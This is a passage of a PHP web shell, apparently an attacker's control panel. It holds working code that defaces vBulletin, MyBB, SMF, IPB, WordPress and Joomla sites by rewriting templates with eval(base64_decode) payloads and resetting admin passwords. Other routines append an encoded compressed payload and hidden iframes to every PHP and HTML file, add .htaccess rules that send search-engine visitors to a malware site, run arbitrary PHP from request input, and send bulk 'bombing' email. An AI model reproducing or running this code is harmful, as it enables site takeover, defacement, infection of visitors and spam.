2246 if($_POST['forumdeface'] == "vb")
2247 {
2248 $con =@ mysql_connect($localhost,$username,$password);
2249 $db =@ mysql_select_db($database,$con);
2250 $index=str_replace('"','\"',$index);
2251 $attack = "{\${eval(base64_decode(\'";
2252 $attack .= base64_encode("echo \"$index\";");
2253 $attack .= "\'))}}{\${exit()}}</textarea>";
2254 if($prefix == "" || $prefix == null)
2255 $query = "UPDATE template SET template = '$attack'";
2256 else
2257 $query = "UPDATE ".$prefix."template SET template = '$attack'";
2258 $result =@ mysql_query($query,$con);
2259 if($result)
2260 echo "<center><font ><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
2261 else
2262 echo "<center><font class=txt ><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
2263 }
2264 else if($_POST['forumdeface'] == "mybb")
2265 {
2266 $con =@ mysql_connect($localhost,$username,$password);
2267 $db =@ mysql_select_db($database,$con);
2268 $attack = "{\${eval(base64_decode(\'";
2269 $attack .= base64_encode("echo \"$index\";");
2270 $attack .= "\'))}}{\${exit()}}</textarea>";
2271 $attack = str_replace('"',"\'",$attack);
2272
2273 if($prefix == "" || $prefix == null)
2274 $query = "UPDATE mybb_templates SET template = '$attack'";
2275 else
2276 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
2277 $result =@ mysql_query($query,$con);
2278 if($result)
2279 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
2280 else
2281 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
2282 }
2283 else if($_POST['forumdeface'] == "smf")
2284 {
2285 $head = $_POST['head'];
2286 $catid = $_POST['f5'];
2287
2288 $con =@ mysql_connect($localhost,$username,$password);
2289 $db =@ mysql_select_db($database,$con);
2290 if($prefix == "" || $prefix == null)
2291 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
2292 else
2293 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
2294 $result =@ mysql_query($query,$con);
2295 if($result)
2296 echo "<center><font ><blink>SMF Forum Index Changed Successfully</blink></font></center>";
2297 else
2298 echo "<center><font class=txt ><blink>Cannot Deface SMF Forum</blink></font></center>";
2299 }
2300 else if($_POST['forumdeface'] == "ipb")
2301 {
2302 $head = $_POST['head'];
2303 $catid = $_POST['f5'];
2304
2305 $IPB = "forums";
2306 $con =@ mysql_connect($localhost,$username,$password);
2307 $db =@ mysql_select_db($database,$con);
2308 if($prefix == "" || $prefix == null)
2309 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
2310 else
2311 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
2312 if($result)
2313 echo "<center><font ><blink>Forum Defaced Successfully</blink></font></center>";
2314 else
2315 echo "<center><font class=txt ><blink>Cannot Deface Forum</blink></font></center>";
2316 }
2317 else if($_POST['forumdeface'] == "wp")
2318 {
2319 $site_url = $_POST['siteurl'];
2320 $index = urlencode($index);
2321 $con =@ mysql_connect($localhost,$username,$password);
2322 $db =@ mysql_select_db($database,$con);
2323 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
2324 echo("<br>[+] Changing admin password to 123456789<br>");
2325
2326 if($req1)
2327 {
2328
2329 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
2330 $data = mysql_fetch_array($req);
2331 $site_url=$data["option_value"];
2332 $output .= "Site : ".$site_url."<br>";
2333
2334 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
2335 $data = mysql_fetch_array($req);
2336 $template = $data["option_value"];
2337
2338 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
2339 $data = mysql_fetch_array($req);
2340 $current_theme = $data["option_value"];
2341
2342 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
2343 $url2=$site_url."/wp-login.php";
2344
2345 $ch = curl_init();
2346 curl_setopt($ch, CURLOPT_URL, $url2);
2347 curl_setopt($ch, CURLOPT_POST, 1);
2348 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=slymn123&rememberme=forever&wp-submit=Log In&testcookie=1");
2349 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2350 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
2351 curl_setopt($ch, CURLOPT_HEADER, 0);
2352 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
2353 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2354 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
2355 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
2356 $buffer = curl_exec($ch);
2357
2358 $pos = strpos($buffer,"action=logout");
2359 if($pos === false) {
2360 $output.= "[-] Successful Login<br />";
2361 } else {
2362 $output.= "[+] Successful Login<br />";
2363 }
2364
2365 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
2366 curl_setopt($ch, CURLOPT_URL, $url2);
2367 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
2368 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
2369 curl_setopt($ch, CURLOPT_HEADER, 0);
2370 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2371 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
2372 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
2373 $buffer0 = curl_exec($ch);
2374
2375 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
2376 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
2377
2378 if(substr_count($_file,"index.php") != 0){
2379 $output.= "[+] index.php Opened<br />";
2380 } else {
2381 $output.= "[-] index.php Unable to open<br />";
2382 }
2383 echo $output;
2384 $url2=$site_url."/wp-admin/theme-editor.php";
2385 curl_setopt($ch, CURLOPT_URL, $url2);
2386 curl_setopt($ch, CURLOPT_POST, 1);
2387 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
2388 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2389 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2390 curl_setopt($ch, CURLOPT_HEADER, 0);
2391 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2392 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
2393 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
2394 $buffer = curl_exec($ch);
2395 curl_close($ch);
2396 $pos = strpos($buffer,'<div id="message" class="updated">');
2397 $cond = 0;
2398 if($pos === false)
2399 echo "<center><font class=txt ><blink>Cannot Deface Wordpress</blink></font></center>";
2400 else
2401 echo "<center><font ><blink>Wordpress Defaced Successfully</blink></font></center>";
2402 } else {
2403 $output.= "[-] DB Error<br />";
2404 }
2405
2406 global $base_path;
2407 unlink($base_path.'COOKIE.txt');
2408 }
2409 else if($_POST['forumdeface'] == "joomla")
2410 {
2411 $site_url = $_POST['siteurl'];
2412 $dbprefix = $_POST['tableprefix'];
2413 $dbname = $_POST['f2'];
2414 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
2415
2416 $co=randomt();
2417
2418 $link=mysql_connect($localhost,$username,$password) ;
2419 mysql_select_db($dbname,$link);
2420
2421 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
2422
2423 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
2424
2425 if ( $req )
2426 {
2427 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
2428 $data = mysql_fetch_array($req);
2429 $template_name=$data["template"];
2430
2431 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
2432 $data = mysql_fetch_array($req);
2433 $template_id=$data["extension_id"];
2434
2435 $url2=$site_url."/index.php";
2436
2437 $ch = curl_init();
2438 curl_setopt($ch, CURLOPT_URL, $url2);
2439 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2440 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2441 curl_setopt($ch, CURLOPT_HEADER, 1);
2442 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2443 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2444 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2445
2446
2447 $buffer = curl_exec($ch);
2448
2449 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
2450 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
2451
2452
2453 $url2=$site_url."/index.php";
2454 $ch = curl_init();
2455 curl_setopt($ch, CURLOPT_URL, $url2);
2456 curl_setopt($ch, CURLOPT_POST, 1);
2457 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
2458 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2459 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2460 curl_setopt($ch, CURLOPT_HEADER, 0);
2461 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2462 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2463 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2464 $buffer = curl_exec($ch);
2465
2466 $pos = strpos($buffer,"com_config");
2467 if($pos === false)
2468 {
2469 echo("<br>[-] Login Error");
2470 exit;
2471 }
2472
2473 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2474 $ch = curl_init();
2475 curl_setopt($ch, CURLOPT_URL, $url2);
2476 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2477 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2478 curl_setopt($ch, CURLOPT_HEADER, 0);
2479 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2480 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2481 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2482 $buffer = curl_exec($ch);
2483
2484 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
2485 if(!$hidden2)
2486 {
2487 echo("<br>[-] index.php Not found in Theme Editor");
2488 exit;
2489 }
2490
2491 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2492
2493 $ch = curl_init();
2494 curl_setopt($ch, CURLOPT_URL, $url2);
2495 curl_setopt($ch, CURLOPT_POST, 1);
2496 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2497 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2498 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2499 curl_setopt($ch, CURLOPT_HEADER, 0);
2500 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2501 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2502 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2503 $buffer = curl_exec($ch);
2504
2505 $pos = strpos($buffer,'<dd class="message message">');
2506 if($pos === false)
2507 {
2508 echo("<center><font ><blink>Cannot Deface Joomla</blink></font></center>");
2509 }
2510 else
2511 {
2512 echo("<center><font class=txt ><blink>Joomla Defaced Successfully</blink></font></center>");
2513 }
2514 }
2515 else
2516 {
2517 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
2518 $data = mysql_fetch_array($req);
2519 $template_name=$data["template"];
2520
2521 $url2=$site_url."/index.php";
2522 $ch = curl_init();
2523 curl_setopt($ch, CURLOPT_URL, $url2);
2524 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2525 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2526 curl_setopt($ch, CURLOPT_HEADER, 1);
2527 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2528 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2529 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2530 $buffer = curl_exec($ch);
2531
2532 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
2533
2534 $url2=$site_url."/index.php";
2535 $ch = curl_init();
2536 curl_setopt($ch, CURLOPT_URL, $url2);
2537 curl_setopt($ch, CURLOPT_POST, 1);
2538 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
2539 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2540 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2541 curl_setopt($ch, CURLOPT_HEADER, 0);
2542 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2543 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2544 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2545 $buffer = curl_exec($ch);
2546
2547 $pos = strpos($buffer,"com_config");
2548
2549 if($pos === false)
2550 {
2551 echo("<br>[-] Login Error");
2552 exit;
2553 }
2554
2555 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2556 $ch = curl_init();
2557 curl_setopt($ch, CURLOPT_URL, $url2);
2558 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2559 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2560 curl_setopt($ch, CURLOPT_HEADER, 0);
2561 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2562 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2563 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2564 $buffer = curl_exec($ch);
2565
2566 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
2567
2568 if(!$hidden2)
2569 {
2570 echo("<br>[-] index.php Not found in Theme Editor");
2571 }
2572
2573 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2574 $ch = curl_init();
2575 curl_setopt($ch, CURLOPT_URL, $url2);
2576 curl_setopt($ch, CURLOPT_POST, 1);
2577 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2578 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2579 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2580 curl_setopt($ch, CURLOPT_HEADER, 0);
2581 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2582 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2583 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2584 $buffer = curl_exec($ch);
2585
2586 $pos = strpos($buffer,'<dd class="message message fade">');
2587 if($pos === false)
2588 {
2589 echo("<center><font ><blink>Cannot Deface Joomla</blink></font></center>");
2590 exit;
2591 }
2592 else
2593 {
2594 echo("<center><font class=txt ><blink>Joomla Defaced Successfully</blink></font></center>");
2595 }
2596 }
2597 }
2598 }
2599 else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
2600 {
2601 //$dir = $_GET['dir'];
2602 $filetype = $_POST['filetype'];
2603
2604 $mode = "a";
2605
2606 if($_POST['mode'] == 'Apender')
2607 $mode = "a";
2608
2609 if($_POST['mode'] == 'Overwriter')
2610 $mode = "w";
2611
2612 if (is_dir($_POST['pathtomass']))
2613 {
2614 $lolinject = $_POST['injectthis'];
2615 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
2616 if(substr($_POST['pathtomass'], -1) == "\")
2617 $mypath = $_POST['pathtomass'] . "*.".$filetype;
2618 foreach (glob($mypath) as $injectj00)
2619 {
2620 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
2621 continue;
2622 $fp=fopen($injectj00,$mode);
2623 if (fputs($fp,$lolinject))
2624 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
2625 else
2626 echo 'failed to inject '.$injectj00.'<br>';
2627 }
2628 $dirs = glob($_POST['pathtomass'] . '/*' , GLOB_ONLYDIR);
2629 foreach ($dirs as $dir)
2630 {
2631 injectdir($dir,$filetype,$mode,$lolinject);
2632 }
2633 echo "<center>".$mycount." files injected</center>";
2634 }
2635 else
2636 echo '<b><'.$_POST['pathtomass'].' is not available!</b>';
2637 }
2638 else if(isset($_POST['mailfunction']))
2639 {
2640 if($_POST['mailfunction'] == "dobombing")
2641 {
2642 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
2643 {
2644 $times = $_POST['times'];
2645 while($times--)
2646 {
2647 if(isset($_POST['padding']))
2648 {
2649 $fromPadd = rand(0,9999);
2650 $subjectPadd = " -- ID : ".rand(0,9999999);
2651 $messagePadd = "
2652
2653 ------------------------------
2654 ".rand(0,99999999);
2655
2656 }
2657 $from = "hello$fromPadd@abcd.in";
2658 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
2659 {
2660 $error = 1;
2661 echo "<center><blink><blink>Some Error Occured!</blink></center>";
2662 break;
2663 }
2664 }
2665 if($error != 1)
2666 echo "<center><font class=txt ><blink>Mail(s) Sent!</blink></font></center>";
2667 }
2668 }
2669 else if($_POST['mailfunction'] == "massmailing")
2670 {
2671 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
2672 {
2673 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
2674 echo "<center><font class=txt><blink>Mail Sent!</blink></font></center>";
2675 else
2676 echo "<center><blink>Some Error Occured!</blink></center>";
2677 }
2678 }
2679 }
2680 else if(isset($_POST['code']))
2681 {
2682 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
2683 {
2684 // FIlter Some Chars we dont need
2685 ?><br>
2686 <textarea name="code" class="box" cols="120" rows="10"><?php
2687 $code = str_replace("<?php","",$_POST['code']);
2688 $code = str_replace("<?","",$code);
2689 $code = str_replace("?>","",$code);
2690
2691 // Evaluate PHP CoDE!
2692 htmlspecialchars(eval($code));
2693 ?>
2694 </textarea><?php
2695 }
2696 else if($_POST['code'] != null && $_POST['intext'] == "false")
2697 {
2698 $code = str_replace("<?php","",$_POST['code']);
2699 $code = str_replace("<?","",$code);
2700 $code = str_replace("?>","",$code);
2701
2702 // Evaluate PHP CoDE!
2703 ?><br><font size="4">Result of execution this PHP-code :</font><br><?php htmlspecialchars(eval($code)); ?><?php
2704 }
2705 }
2706 else if(isset($_GET['infect']))
2707 {
2708 $mal_code="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";
2709 $coun = 0;
2710 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
2711 {
2712 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
2713 continue;
2714 if($myfile=fopen($injectj00,'a'))
2715 {
2716 fputs($myfile, gzuncompress(base64_decode($mal_code)));
2717 fclose($myfile);
2718 $coun = 1;
2719 }
2720 }
2721 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2722 {
2723 if($myfile=fopen($injectj00,'a'))
2724 {
2725 fputs($myfile, gzuncompress(base64_decode($mal_code)));
2726 fclose($myfile);
2727 $coun = 1;
2728 }
2729 }
2730 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2731 {
2732 if($myfile=fopen($injectj00,'a'))
2733 {
2734 fputs($myfile, gzuncompress(base64_decode($mal_code)));
2735 fclose($myfile);
2736 $coun = 1;
2737 }
2738 }
2739 if($coun == 1)
2740 echo "<center>Done !!!!<center>";
2741 else
2742 echo "<center>Cannot open files !!!!<center>";
2743 }
2744 else if(isset($_GET['infectiframe']))
2745 {
2746 $coun = 0;
2747 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
2748
2749 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
2750 {
2751 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
2752 continue;
2753 if($myfile=fopen($injectj00,'a'))
2754 {
2755 fputs($myfile, $str);
2756 fclose($myfile);
2757 $coun = 1;
2758 }
2759 }
2760 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2761 {
2762 if($myfile=fopen($injectj00,'a'))
2763 {
2764 fputs($myfile, $str);
2765 fclose($myfile);
2766 $coun = 1;
2767 }
2768 }
2769 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2770 {
2771 if($myfile=fopen($injectj00,'a'))
2772 {
2773 fputs($myfile, $str);
2774 fclose($myfile);
2775 $coun = 1;
2776 }
2777 }
2778
2779 if($coun == 1)
2780 echo "<center>Done !!!!<center>";
2781 else
2782 echo "<center>Cannot open files !!!!<center>";
2783 }
2784 else if(isset($_GET['redirect']))
2785 {
2786 if($myfile = fopen(".htaccess",'a'))
2787 {
2788 $mal = "# BEGIN WordPress
2789 RewriteEngine On
2790 RewriteOptions inherit
2791 RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
2792 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
2793 RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
2794 RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
2795 RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
2796 RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
2797 RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
2798 RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
2799 RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
2800 RewriteRule .* ".$malsite." [R,L]
2801 ";
2802 fwrite($myfile, $mal);
2803 fclose($myfile);
2804 echo "<center>Done !!!!<center>";
2805 }
2806 else
2807 echo "<center>Cannot open file !!!!<center>";
2808 }
2809 else if(isset($_GET['malware']))
2810 {
2811 ?>
2812 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
2813 <center><table><tr><td><a href=javascript:void(0) onClick="malwarefun('infect')"><font size="4">| Infect Users |</font></a></td>
2814 <td><a href=# onClick="malwarefun('infectiframe')"><font size="4">| Infect Users with Iframe |</font></a></td>
2815 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center><div id="showmal"></div>
2816 <?php
2817 }
2818 else if(isset($_GET['codeinsert']))
2819 {
2820 if($file1 = fopen(".htaccess",'r'))
2821 { ?><div id="showcode"></div>
2822 <form method=post>
2823 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
2824 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
2825 </form>
2826 <?php }
2827 else
2828 echo "<center>Cannot Open File!!</center>";
2829 }
2830 else if(isset($_POST['getcode']))
2831 {
2832 if($myfile = fopen(".htaccess",'a'))
2833 {
2834 fwrite($myfile, $_POST['getcode']);
2835 fwrite($myfile, "
2836 ");
2837 fclose($myfile);
2838 echo "<font class=txt>Code Inserted Successfully!!!!!</font>";
2839 }
2840 else
2841 echo "Permission Denied";
2842 }
2843 else if(isset($_GET['uploadurl']))
2844 {
2845 $functiontype = trim($_GET['functiontype']);
2846 $wurl = trim($_GET['wurl']);
2847 $path = magicboom($_GET['path']);
2848
